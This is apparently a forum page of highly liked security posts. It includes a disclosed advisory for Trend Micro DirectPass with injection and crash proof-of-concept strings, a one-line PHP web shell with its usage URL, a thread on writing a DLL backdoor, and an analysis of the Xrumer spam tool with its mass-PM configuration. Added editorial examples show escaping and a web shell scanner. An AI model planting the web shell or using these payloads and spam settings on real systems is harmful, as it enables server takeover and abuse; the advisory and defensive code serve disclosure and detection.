Government Security
Network Security Resources


Most Liked Content


#227329 Irc

Posted by Stephen on 30 December 2013 - 10:22 PM

It is a sad day indeed. I remember back in 2002 when I started the channel; time and a busy lifestyle made it hard for me to be around for quite some time. I am glad people got some good use out of it. As you can see there is a lot of work going on around the site; maybe once we are done restoring the site we can look into pumping new life into the channel.


  • k0nsl likes this


#226610 Trend Micro Directpass 1.5.0.1060 - Multiple Software Vulnerabilities

Posted by remove on 20 May 2013 - 03:35 PM

Title:
======
Trend Micro DirectPass 1.5.0.1060 - Multiple Vulnerabilities


Date:
=====
2013-05-21


References:
===========
http://www.vulnerabi...tent.php?id=894
Article: http://www.vulnerabi....com/dev/?p=580
Trend Micro (Reference): http://esupport.tren...US/1096805.aspx
Trend Micro Solution ID: 1096805
Video: http://www.vulnerabi...tent.php?id=951


VL-ID:
=====
894


Common Vulnerability Scoring System:
====================================
6.1


Introduction:
=============
Trend Micro™ DirectPass™ manages website passwords and login IDs in one secure location, so you only need to remember one password. Other features include: keystroke encryption, secure password generation, automatic form-filling, confidential notes, and a secure browser.
Convenience - You can securely and easily manage passwords for numerous online accounts with just one password and automatically log in to your websites with one click.
More Security - You get an extra layer of online security with a specially designed browser for online banking and financial websites and protection from keylogging malware.
No Hassles - You don't have to be a technical wizard to benefit from this password service; it's simple to use.
Confidence - You can have peace of mind using a password service provided by an Internet security provider with 20+ years of experience.
All Your Devices - You can use the DirectPass password manager on Windows PCs, Android mobiles, Android tablets, iPads and iPhones, and all devices are automatically encrypted and synchronized using the cloud.
(Copy of the Vendor Homepage: http://www.trendmicr...pass/index.html )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple software vulnerabilities in the official Trend Micro DirectPass v1.5.0.1060 software.


Report-Timeline:
================
2013-03-08: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-03-09: Vendor Notification (Trend Micro - Security Team)
2013-03-16: Vendor Response/Feedback (Trend Micro - Karen M.)
2013-05-09: Vendor Fix/Patch (Trend Micro - Active Update Server)
2013-05-15: Vendor Fix/Patch (Trend Micro - Solution ID & Announcement)
2013-05-21: Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Trend Micro
Product: DirectPass 1.5.0.1060


Exploitation-Technique:
=======================
Local


Severity:
=========
High


Details:
========
1.1
A local command injection vulnerability is detected in the official Trend Micro DirectPass v1.5.0.1060 software.
The vulnerability allows local low privileged system user accounts to inject system specific commands or local path requests to compromise the software.
The vulnerability is located in the DirectPass master password setup module of the Trend Micro InstallWorkspace.exe file. The master password module of the software allows users to review the entered password in the second step for security reasons. The hidden, protected master password will only be visible in the check module when the customer mouses over the censored password field. When the software displays the hidden password in plain text, the command/path injection is executed out of the unparsed master password context in the field listing.
Exploitation of the vulnerability requires a low privilege system user account with DirectPass access and low or medium user interaction.
Successful exploitation of the vulnerability results in software and system process compromise or execution of local system specific commands/paths.

Vulnerable File(s):
    [+] InstallWorkspace.exe

Vulnerable Module(s):
    [+] Setup Master Password

Vulnerable Parameter(s):
    [+] Master Password

Affected Module(s):
    [+] Check Listing (Master Password)


1.2
A persistent input validation vulnerability is detected in the official Trend Micro DirectPass v1.5.0.1060 software.
The bug allows local attackers with a low privileged system user account to implement/inject malicious script code on the application side (persistent) of the software.
The persistent web vulnerability is located in the DirectPass check module when listing a manipulated master password. In step one, inject a malicious iframe into the hidden fields as the master password. The inserted context will be saved and executed in the next step, when the master password context is listed in the last check module. To bypass the validation and execute the injected script code the attacker needs to split (%20) the input request.
Exploitation of the vulnerability requires medium user interaction and a low privilege system user account with DirectPass.
Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), persistent phishing, persistent external redirects to malware or scam and persistent web context manipulation of the affected vulnerable module.

Vulnerable File(s):
    [+] InstallWorkspace.exe

Vulnerable Module(s):
    [+] Setup Master Password

Vulnerable Parameter(s):
    [+] Master Password

Affected Module(s):
    [+] Check Listing (Master Password)


1.3
A critical pointer vulnerability (DoS) is detected in the official Trend Micro DirectPass v1.5.0.1060 software.
The bug allows local attackers with a low privileged system user account to crash the software via a pointer vulnerability.
The pointer vulnerability is also located in the DirectPass master password listing section. Attackers can inject scripts with loops to mouse over the hidden password check listing of the master password multiple times. The result is a stable crash of InstallWorkspace.exe. The problem occurs in the libcef.dll (1.1.0.1044) of the Trend Micro DirectPass software core.
Exploitation of the vulnerability requires medium user interaction and a low privilege system user account with DirectPass.
Successful exploitation of the denial of service vulnerability can lead to a software core crash and also stable software module hangups.

Vulnerable File(s):
    [+] InstallWorkspace.exe

Vulnerable Library:
    [+] libcef.dll (Dynamic Link Library)

Vulnerable Module(s):
    [+] Check Listing (Master Password)

Vulnerable Parameter(s):
    [+] Master Password


Proof of Concept:
=================
1.1
The code injection vulnerability can be exploited by local attackers with a privileged system user account and medium or high user interaction.
For demonstration or reproduction ...

PoC: B%20>">../;'[COMMAND|PATH INJECT!]>

Example Path: C:\Users\BKM\TrendMicro DirectPass

Note: The bug allows attackers to request local restricted folders with the system software privileges to manipulate software files and the bound dynamic link libraries.


1.2
The persistent script code injection vulnerability can be exploited by local attackers with a privileged system user account and medium or high user interaction.
For demonstration or reproduction ...

PoC: (Input) B%20>"<iframe src=a>[PERSISTENT SCRIPT CODE!]

Note: The master password is restricted to 20 chars per field on insert. The execution of persistently injected frames also works with an external source.


1.3
The pointer (DoS) vulnerability can be exploited by local attackers with a privileged system user account and low, medium or high user interaction.
For demonstration or reproduction ...

Path:                 C:\Downloadz\TrendMicro_DP_MUI_Download\Package\Share\UI
Dynamic Link Library: libcef.dll

PoC: (Input) %20%000000---%000%20

Note: The string crashes the master password check review module and the InstallWorkspace.exe software process via a null pointer (DoS) bug. Reproducing the vulnerability can result in a permanent denial of service when the context is saved in the first instance and the save has been canceled.

Critical Note: When I was checking the section I was thinking about how to use the injected code in the section to get access to the stored password. I loaded my debugger and attached it to the process when the request was successful and saved the address. After that I reproduced the same request with the debugger attached and exploited the issue in the local cloud software mask. Then I reviewed the changes and was able to use the injected frame test to see the location of the memory in the debugger. By injecting more and more context I was able to see where the location of the password in memory had been stored when the software redisplays the saved temp password. To this day I have never seen this kind of method in any book or paper, but I am sure I will soon write about the incident.


Solution:
=========
Both vulnerabilities can be patched by a secure parse or encode of the master password listing in the master password check module of the software.
Filter and parse the master password and description security tip input fields.
For the denial of service issue no solution is available yet, but the fixes will prevent manual exploitation of the issue.

Note: The update has been available from the update server since the 12th of May, but Trend Micro says it was the 9th of May. On the 18th we downloaded the main DirectPass software again and tested the core without an update, and it was still vulnerable. To fix the issue in the software an update from the update server is required after the install.


Risk:
=====
1.1
The security risk of the local command/path injection software vulnerability in the DirectPass software core is estimated as high(-).

1.2
The security risk of the persistent script code injection vulnerability is estimated as medium(+).

1.3
The security risk of the pointer (DoS) software vulnerability is estimated as medium(-).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:  www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact:  admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section:  video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social:   twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:    vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get permission.

Copyright © 2013 | Vulnerability Laboratory


  • EneleSabe likes this
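Editor's added example, not Trend Micro's code and not part of the advisory above. The advisory's findings 1.2 and 1.3 come down to one mistake: the master-password "check listing" is an HTML view (libcef.dll is the Chromium Embedded Framework) and the password text is placed into it as markup rather than as text. The block below shows the vulnerable concatenation beside a hardened renderer that escapes for the HTML text context and rejects control characters, using the advisory's own PoC strings as input. The function and template names are this example's own, and URL-decoding the field value (so that `%00` becomes a NUL byte) is an assumption about the UI that the advisory does not state.

```python
# Added example (not Trend Micro's code): rendering untrusted text into an
# HTML-based UI. Names and the URL-decoding step are this example's assumptions.
import html
import re
from urllib.parse import unquote

# Constructed inputs: the advisory's PoC strings, URL-decoded.
POC_IFRAME = unquote('B%20>"<iframe src=a>')          # finding 1.2
POC_DOS = unquote('%20%000000---%000%20')             # finding 1.3 (contains NUL)

TEMPLATE = '<span class="pw-reveal">{}</span>'
_CONTROL_CHARS = re.compile(r'[\x00-\x1f\x7f]')


def render_check_listing_unsafe(master_password: str) -> str:
    """The vulnerable pattern: raw concatenation of input into markup.
    '<iframe src=a>' inside the password becomes a live element."""
    return TEMPLATE.format(master_password)


def render_check_listing_safe(master_password: str) -> str:
    """Hardened: escape &, <, >, \" and ' for the HTML text context, and refuse
    C0 control characters (NUL etc.), which the DoS PoC string consists of,
    before they ever reach the rendering engine."""
    if _CONTROL_CHARS.search(master_password):
        raise ValueError('master password contains control characters')
    return TEMPLATE.format(html.escape(master_password, quote=True))


def has_injected_tag(rendered: str) -> bool:
    """Demo check: does anything other than the wrapper span survive as a tag?"""
    inner = rendered[len('<span class="pw-reveal">'):-len('</span>')]
    return re.search(r'<[A-Za-z!/]', inner) is not None


if __name__ == '__main__':
    print(render_check_listing_unsafe(POC_IFRAME))   # live <iframe> in the markup
    print(render_check_listing_safe(POC_IFRAME))     # same text, now inert
```

The escaping is context-specific: `html.escape` is right for element text, but a value that lands inside a `<script>` block or a URL attribute needs a different encoder, and the 20-character limit the advisory mentions is not a defence at all since the iframe PoC fits inside it.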


#210953 Skype 5.8 & 5.5 - Corruption & Persistent Vulnerability

Posted by remove on 07 April 2012 - 07:21 PM

Title:
======
Skype 5.8 & 5.5 - Corruption & Persistent Vulnerability


Date:
=====
2012-03-29


References:
===========
Download: http://www.vulnerabi.../videos/447.wmv
View:



VL-ID:
=====
457


Status:
========
Published


Exploitation-Technique:
=======================
Offensive


Severity:
=========
High


Details:
========
The video shows an exploitation session by the researchers Ucha G., Alexander Fuchs & Benjamin Kunz Mejri.
The video explains how the denial of service vulnerability via pointer corruption, triggered by sending symbols, is persistently exploitable.


Credits:
========
Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x), Alexander Fuchs (f0x23) & Benjamin Kunz Mejri (Rem0ve)


Disclaimer:
===========
The information provided in this video is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012|Vulnerability-Lab


  • EneleSabe likes this


#210861 How Is Loftek Cxs 2200 Ip Camera?

Posted by powerlife2000 on 25 March 2012 - 07:33 AM

I stumbled across a topic a few days ago on another forum and got only one reply. The topic was to recommend me a type of IP camera for car (garage) and home surveillance. Then I got a useful reply that told me to consider some details for an IP camera. I thought about it more and just want it to come with night vision and be waterproof. And the video captured, of course, should be high definition. Yesterday, I just googled and found an IP camera in Google Shopping. That is the Loftek CXS 2200. The price is relatively cheap and the reviews good. Then I contacted Loftek IP camera tech support with some questions, and their replies really satisfied me. After all, I am just a layman in terms of IP cameras. How is the Loftek CXS 2200 (http://www.amazon.co..._cp_p_2)? Please give me your cherished advice or anything useful about this camera.
  • EneleSabe likes this


#208082 How To Delete Your Browser's History On A Mac?

Posted by infiltrator on 28 November 2010 - 07:53 PM

Deleting cookies off a web browser shouldn't be a mystery.
Every browser has a menu option somewhere, and from there it shouldn't be too hard to figure out.

That guide should be able to assist any novice user in deleting cookies off their browser. Nice one, bro. Keep it up.

On the other hand, if you are a Windows user, a tool like CCleaner could be used to remove almost any trace of internet activity on your computer.
  • EneleSabe likes this


#207975 How To Delete Your Browser's History On A Mac?

Posted by suxia on 15 November 2010 - 05:39 PM

When we browse the Web using IE, it tends to leave a record. For data security reasons, we often need to clear the browser history. But how can you clear the browser history record? Mac computer users can clear browser history on Mac.

Choosing to delete history on Mac not only guarantees the privacy of your work; it also makes sure your personal privacy is not compromised.

The following are the key features of delete history on Mac.
1. Safe to operate on your Mac computer
Clear cache for Mac is safe software; it doesn't have a write-perform function when it runs on your Mac.
2. Optimize the computer system
It can improve the Mac computer environment by clearing the cache and widgets.
3. Improve the storage space
It can access the hidden storage area to clear some widgets to improve the storage environment.
4. All-in-one utility
It can clear all the cache that stays on your Mac computer. All you have to do is press a button.
5. Easy to use
Clear cache for Mac software makes system maintenance simple with an easy point and click; with a simple click, a novice can easily keep the system running at its best.
6. Clear the system cache, cookies and folder cache
One of the best features of clear cache for Mac is its ability to easily clear the system cache, cookies and folder cache that affect your computer system.
7. Clean up portable devices
Keep your removable device free from those annoying and unnecessary service files.
8. Clear plug-ins to release disk space
Clear cache for Mac software easily erases all the plug-ins that stay in your disk space. To finish this you just need some simple clicks.
9. Multifunctional feature
It can capture the pesky bug when new software is operated.

How to Delete your Browser's History on a Mac
You can clear browser history on Mac by following these steps.
Instructions
Step 1
Open your browser and click "Tools" at the top of the screen.
Step 2
From the sub-menu, choose "Clear Private Data." Put a check mark next to "Browsing History" in the pop-up menu. Select any other items that you'd like to clear, such as your download history or saved form history.
Step 3
Deselect any check marks next to any items that you do not wish to clear. Click "Clear."
  • EneleSabe likes this


#203663 Google Wave Invites

Posted by Guest on 16 October 2009 - 01:37 AM

Never mind, I got one from the google team already :)
  • Stephen likes this


#203650 Google Wave Invites

Posted by bonarez on 15 October 2009 - 07:01 AM

Hi Dennis,

I have some invites left..

PM or Mail me

bonarez
  • Stephen likes this


#203526 Google Wave Invites

Posted by Guest on 05 October 2009 - 05:40 AM

Hi,

As you may know, Google Wave has released over 100,000 invites, each holding 8 other invitations. Would anyone happen to have one for me? My invites will be spread among GSO's members, of course :)

Regards,

Dennis
  • Stephen likes this


#203063 Creating A Backdoor Using Dll

Posted by colinsouth on 19 August 2009 - 10:24 PM

Don't be a prick; I'm not asking anyone to code a single line of code for me.

I've written the DLL injection, and know how to make DLLs.

I'm really missing the point though...

Do I make a DLL that just deals with the network stuff, to bypass the firewall, to just send the data to the client via its host process; or what?

No need for your non-constructive post.
  • colinsouth likes this


#202686 How To Overide Rm Filter

Posted by Guest on 16 July 2009 - 08:30 AM

Have you tried any cgi proxy websites?
  • Squirell likes this


#202570 Small Pma Shell

Posted by webdevil on 02 July 2009 - 09:14 PM

<?php system($_GET['cmd']); ?>

That should do the trick.

Once that is uploaded you can try this

http://site/shell.php?cmd=command


  • tommy1987 likes this
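Editor's added example, not code from the thread above: the one-liner posted there is the canonical PHP web shell, and the defensive counterpart is being able to find it on a server. The scanner below flags PHP source in which a command-execution or evaluation function receives request input, either directly (`system($_GET['cmd'])`), through one intermediate variable, or hidden behind `eval(base64_decode(...))`. The function names, regexes and the four sample files are this example's own constructions, and the decoded base64 payload in the sample is simply the posted shell.

```python
# Added example (not from the thread): a small pattern-based web shell scanner.
# Regex names, sample files and the findings text are this example's own.
import re
from typing import Dict, List, Tuple

EXEC_FUNCS = r'\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)'
SUPERGLOBAL = r'\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\s*\['

# exec/eval call whose argument list (up to the next ';') contains request input
DIRECT_SINK = re.compile(EXEC_FUNCS + r'\s*\([^;]*?' + SUPERGLOBAL, re.I | re.S)
# request input copied into a variable (the two-hop case)
ASSIGN = re.compile(r'(\$\w+)\s*=\s*' + SUPERGLOBAL, re.I)
# eval() over a decoded blob, the usual way to hide the first pattern
OBFUSCATED = re.compile(r'\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(', re.I)


def scan_php(source: str) -> List[str]:
    """Return a list of findings; an empty list means nothing matched."""
    findings: List[str] = []
    if DIRECT_SINK.search(source):
        findings.append('request input passed straight to an exec/eval sink')
    if OBFUSCATED.search(source):
        findings.append('eval() over decoded/obfuscated payload')
    tainted = {m.group(1) for m in ASSIGN.finditer(source)}
    for var in sorted(tainted):
        sink = EXEC_FUNCS + r'\s*\([^;]*' + re.escape(var) + r'\b'
        if re.search(sink, source, re.I | re.S):
            findings.append(f'request input reaches a sink via {var}')
    return findings


# Constructed samples: the shell from the post, a two-hop variant, an
# obfuscated variant (base64 of the same one-liner), and a benign page.
SAMPLES: List[Tuple[str, str]] = [
    ('shell.php', "<?php system($_GET['cmd']); ?>"),
    ('two_hop.php', "<?php $c = $_POST['c'];\n echo shell_exec($c); ?>"),
    ('obf.php', "<?php eval(base64_decode('c3lzdGVtKCRfR0VUWydjJ10pOw==')); ?>"),
    ('page.php', "<?php echo htmlspecialchars($_GET['name']); ?>"),
]


def scan_all(samples: List[Tuple[str, str]] = SAMPLES) -> Dict[str, List[str]]:
    return {name: scan_php(src) for name, src in samples}


if __name__ == '__main__':
    for name, hits in scan_all().items():
        print(name, '->', hits or 'clean')
```

Regex scanning of this kind is a triage tool, not a proof of absence: a shell that builds the function name at runtime (`$f = 'sys' . 'tem'; $f($_GET['c']);`) slips past it, which is why file-integrity monitoring of the web root and disabling unneeded functions in `php.ini` (`disable_functions`) matter more than the pattern list.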


#192200 awk script

Posted by SuRGeoN on 08 June 2008 - 01:21 AM

If the file with this data is named "input_file", then the following bash/shell script will work fine. Maybe it's not the perfect solution, but it works :)

Shell Script
-------------

#!/bin/bash

# Field 2 of each line is the neighbour IP; keep only dotted quads, de-duplicated.
ips=$(awk '{print $2}' input_file | grep -E '^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$' | sort -u)

for ip in $ips; do
  # Peer name: field 4 of the line holding this IP and " in", minus its -IN suffix.
  # (The dots in $ip are regex wildcards here, which is harmless for this input.)
  name=$(grep "$ip.* in" input_file | awk '{print $4}' | sed 's/-IN$//')
  # "Yes" if any line for this IP carries a maximum-prefix setting.
  if grep -q "$ip.*maximum-prefix" input_file; then
    echo "$name $ip Yes"
  else
    echo "$name $ip No"
  fi
done

Output
--------

AXTEL 148.223.23.65 No
PROTEL 201.117.10.141 Yes
MARCATEL 201.125.74.109 Yes

Then you can use mail command... it's up to you.

Have a nice day
  • Dr RNA likes this


#190441 HP 2710p TabletPC's review

Posted by ceder on 25 April 2008 - 08:02 AM

Posted Image
There is a strong switch with no gap to release the screen in the middle, and the power switch on the left.

Posted Image
The night-light.

Posted Image
Global view in laptop mode.

Posted Image
Back view.
You can see a dock port and a battery port, which I don't have. Battery life is about 4 hours with wifi, Firefox, Word and brightness in the middle.
It can last 5 hours when you shut down wifi. HP has a great system which enables you to recharge 90% of your battery in only 1 hour.
If that's not enough for you, you can add a slim extra battery to have 10 hours of power.

Posted Image
Battery indicator.
You don't have to switch on your laptop to verify your battery status; blue LEDs indicate the level of charge of the battery.

Posted Image
The pen garage is easy to use and robust. The pen won't go out alone ;)

5) Ink experience and daily use
I am a student and I use my TabletPC every day. At the beginning, I was afraid of the trackpoint. I had never used one,
but I got used to it quickly and I don't see the difference from a touchpad now. I wanted a laptop which had enough battery
for a day at school and I must say that I found the right product. If I don't have a power plug near me during my courses,
I can always find one at lunchtime and recharge my laptop quickly. I was afraid of the HDD's speed too, but in fact it only
increases the boot time, and I always put my laptop in sleep mode so it doesn't take too long to boot. The screen is very good;
when I write on it, I feel like I'm writing with a pen on a sheet of paper. It's bright enough to use your TabletPC inside and
outside. The 2710p is light; you can stand in slate mode for an hour without feeling pain in your arm.


During this review, I didn't talk about handwriting recognition. It depends on the OS you choose. From my experience, I can say that
Vista is better at this than Windows XP 2005 TabletPC Edition. I have had a TabletPC for a year and a half and I will never return to
a normal laptop. ;)

I hope you have enjoyed this review. I apologize for my bad English and I hope you'll become an adept of TabletPCs like me :P
If you have any questions, I'll be glad to answer all of them.

6) Links

HP website
TabletPC reviews website (english)
TabletPC reviews (french)
  • Jeremy likes this


#188880 Enable Telnet Server Xp

Posted by bonarez on 19 March 2008 - 06:57 AM

strSvcName = "Telnet"
strStartupType = "Automatic" 
strComputer = "."
set objWMI = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
set objService = objWMI.Get("Win32_Service.Name='" & strSvcName & "'")
intRC = objService.Change(,,,,strStartupType)

What is the function of this half exactly?:
set objWMI = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")


Sorry for the late reaction, just read your reply..

Basically you create an object, with the name objWMI (WMI stands for Windows Management Instrumentation).
You set the object to connect to "winmgmts" (the WBEM services).
strComputer is just a var that holds the computer name you want to connect to.
"\root\cimv2" is the namespace we want to connect to; there are more namespaces, but this one is used most of the time for management purposes.

Here's a nice read: hxxp://www.wilsonmar.com/1wmiwbem.htm

When working in domains using ADSI I preferred using the LDAP way to connect, but I haven't been VBScripting much lately.. PowerShell is the new cool

edit: some cool stuff to play with when you're looking into adsi/vbs/wmi/hta:
hxxp://www.microsoft.com/technet/scriptcenter/createit.mspx
  • bawlls likes this


#185922 Newb Needs Help Getting Http Info

Posted by basher on 21 December 2007 - 01:19 AM

Get netcat, then type (replace <host> and <port>, obviously):
nc <host> <port>
HEAD / HTTP/1.1
Host: <host>
Press enter twice after the last line.
  • basher likes this
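Editor's added example, not code from the post above: the same exchange the post types into netcat, written out so the two things beginners get wrong are visible, namely that HTTP/1.1 requires a `Host` header and that the header block ends with an empty line (the "press enter twice"). The request builder and the response parser run offline against a constructed sample banner; `fetch_head` is the live version over a plain TCP socket. Function names and the sample response are this example's own.

```python
# Added example (not from the post): build the HEAD request netcat sends and
# parse the status line plus headers that come back. Names and the canned
# response are this example's constructions.
import socket
from typing import Dict, Tuple


def build_head_request(host: str, path: str = '/') -> bytes:
    """CRLF line endings, a Host header (mandatory in HTTP/1.1), and an empty
    line to terminate the header block, exactly what the post types by hand."""
    lines = [
        f'HEAD {path} HTTP/1.1',
        f'Host: {host}',
        'Connection: close',   # ask the server to hang up instead of waiting
        '',
        '',
    ]
    return '\r\n'.join(lines).encode('ascii')


def parse_response_head(raw: bytes) -> Tuple[int, str, Dict[str, str]]:
    """Return (status code, reason phrase, headers) from a response head.
    Header names are lower-cased so lookups are case-insensitive."""
    head = raw.split(b'\r\n\r\n', 1)[0].decode('iso-8859-1')
    status_line, *header_lines = head.split('\r\n')
    parts = status_line.split(' ', 2)
    if len(parts) < 2 or not parts[0].startswith('HTTP/'):
        raise ValueError(f'not an HTTP status line: {status_line!r}')
    code = int(parts[1])
    reason = parts[2] if len(parts) == 3 else ''
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(':')
        if sep:
            headers[name.strip().lower()] = value.strip()
    return code, reason, headers


def fetch_head(host: str, port: int = 80, timeout: float = 5.0):
    """Live version (needs network): same exchange over a TCP socket."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_head_request(host))
        buf = b''
        while b'\r\n\r\n' not in buf:
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return parse_response_head(buf)


# Constructed sample response, the sort of banner a HEAD request returns.
SAMPLE_RESPONSE = (
    b'HTTP/1.1 200 OK\r\n'
    b'Server: Apache/2.2.3 (CentOS)\r\n'
    b'X-Powered-By: PHP/5.1.6\r\n'
    b'Content-Type: text/html; charset=UTF-8\r\n'
    b'Connection: close\r\n'
    b'\r\n'
)

if __name__ == '__main__':
    print(build_head_request('example.org').decode())
    print(parse_response_head(SAMPLE_RESPONSE))
```

Two caveats a practitioner would add: plain netcat (and this socket code) cannot talk to an HTTPS port, where the same request has to go through a TLS wrapper (`ssl.create_default_context().wrap_socket(...)`), and `Server`/`X-Powered-By` values are whatever the administrator chose to send, so they are a hint about the stack, not proof of it.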


#185529 Convert Text To Html Entities

Posted by basher on 10 December 2007 - 06:34 PM

..better late than never..

function entityenc($str)
{
    // chunk_split() appends "\r\n" after every single character, so exploding
    // on it gives one element per byte plus a trailing empty element (hence
    // the "count - 1" bound). Note this works per byte: a multi-byte UTF-8
    // character becomes one entity per byte, not one entity per character.
    $text_array = explode("\r\n", chunk_split($str, 1));
    $newstring = '';
    for ($n = 0; $n < count($text_array) - 1; $n++)
    {
        $newstring .= "&#" . ord($text_array[$n]) . ";";
    }
    return $newstring;
}
  • basher likes this


#181944 Xrumer Exposed

Posted by APX on 05 September 2007 - 05:06 AM

Xrumer 3

First of all I want to thank Ex0rPhine for helping me analyze, unprotect and disassemble this program; thanks a lot, bro.

A few weeks ago I was browsing a Russian forum and found a link to a full working copy of Xrumer 3, so I decided to see how it worked and whether it really uses some alien tech to manage captchas.
I see no alien tech around, but we can find an interesting idea nicely implemented. In this article I will try to explain the basics of how it works, and an easy way to avoid being spammed by it.
Sadly, I can't say anything about the captcha recognizing engine, because I don't have much free time, and honestly I think it is impossible to understand a complex algorithm by looking at the ASM disassembly.
Ok, let's begin.

What is Xrumer?

Its creators at botmaster.net say "XRumer is a software application that automatically posts your messages to forums, guestbooks, bulletin boards and catalogs of links (as well as into livejournals and wikis). In a word, it is an autosubmitter." Or, I'd say, in a word it is a tool to spam anything that isn't an email.
Xrumer 3 allows sending PMs in phpBB and vBulletin boards.
But the coolest feature of Xrumer is that it can create new accounts in forums automatically, working around pictocode protection or email confirmation.
Here we can see the captchas it can handle.

Posted Image

Here you can see a video of Xrumer 3 at work.
http://blogs.pandasoftware.com/blogs.....;/24/xrumer.swf

XRumer File Structure

Folders

Debug/ - Here is the log of a single test forum processing, after pressing the "Test" button
img/ - Graphic information is stored in this folder
Langpack/ - Language packs
Links/ - Here are stored all databases which contain links of forums and guestbooks. File format: *ForumsList id*.txt
Logs/ - This folder contains report files (reports are created automatically while the program works)
Projects/ - Here the files of your projects are stored. File format: *.xpy


Files

config.ini - the program configuration file
proxy.ini - proxy checking settings
xblack.txt - black list (forums where posting is undesirable)
xprior.txt - contains the forums' default categories, where it is recommended to post messages
xproxy.txt - contains the HTTP proxy list. It is updated automatically, or the user fills it in.
xsocks.txt - contains the SOCKS proxy list (must be filled in by the user)


Types of links databases

There are 5 types.

ForumsList id*.txt - the main database.

ZForumsList id*.txt - a database that was formed during the last session when going through the main database. The links stored in this database point directly to the page where the message is posted.

MForumsList id*.txt - the database with activation links, formed during the downloading of activation links from the e-mail inbox (it is created if the "Profile activation via email" option is set to manual mode).

RForumsList id*.txt - the database with links to use the "Reply" option on forums. By using this option you can reply to your previous posts. Created while executing the "Forums" database list.

EForumsList id*.txt - the databases for editing earlier created posts.



Basics

Xrumer is coded in Delphi, and the resulting .exe is protected using ASPack v2.12.
When you start XRumer, it connects to botmaster.ru and botmaster2.ru and makes some requests about the account. If you block access to botmaster via the hosts file, it says "blah, blah, internet connection problem..." and exits. (EOP dixit)

In order to use Xrumer you need a valid account, which is maintained by paying $10 monthly to the botmaster.ru guys. Ex0rPhine found a few accounts and tried them, but all the accounts were dead; that's why we never spammed any forum.

If you watched the video, by now you should have a pretty good idea of what this program does, and how to use it, in this section I'll try to give some basic insight in how it works.

Message Preview. You can preview how your messages will look using this module, and XRumer will open a page in your browser that simulates a board showing your message.
Also you can use macros to create variations of your message to post.

The proxy engine. Xrumer can use anonymous proxies or SOCKS5 and has an anonymous proxy leecher; the URLs to leech are stored in a txt file that by default comes with 41 entries and includes a few that don't work. The leeched proxies are stored in xproxy.txt and xsocks.txt.
This works like any other proxy tester engine, nothing new.

Target List. It comes with 158352 targets ready to spam, or you can use the companion program Hrefer, which looks in search engines (Yandex, Google, MSN, Yahoo, Altavista) for new possible targets. In Hrefer you can specify keywords to narrow your target search or use predefined templates to search only for "guestbooks", "phpBB boards", "vBulletin boards", etc.

Mass PM. Starting with version 3.0, XRumer can mass PM a complete board; the manual says it can only do it in vBulletin and phpBB boards, but if we inspect the file masspm.ini we can see that it also has the links to do it in Invision boards.
The XRumer manual comes with this note about Mass PM:

As the Personal Messages system of mass posting is new in Xrumer 3.0, some of the forums have a very reliable protection system against automated postings, such as (it is forbidden to send a message more often than once in ~20 seconds, it is forbidden to send more than 3-5 messages a day, etc.). However, we are constantly working on new ways to circumvent these systems.


masspm.ini

[phpBB]
Name=phpBB
Memberlist=memberlist.php
Nexpage=[...]memberlist.php?mode=joined&order=ASC&start=[...]
MessagePM=[...]privmsg.php?mode=post&u=[...]
MessagePMgen=privmsg.php?mode=post&u=
Profile=[...]profile.php?mode=viewprofile&u=[...]
IdentField=u

[IPB]
Name=invisionboard.com
Memberlist=index.php?act=Members&filter=ALL&sort_key=joined&sort_order=asc&max_results=50
Nexpage=index.php?&act=Members[...]filter=ALL[...]&st=[...]
MessagePM=index.php?act=Msg&CODE=4&MID=
Profile=showuser=

[VBulletin]
Name=vBulletin
Memberlist=memberlist.php?&order=ASC&sort=joindate&pp=30
Nexpage=[...]memberlist.php?do=getall&page=[...]&pp=30&order=asc&sort=joindate[...]
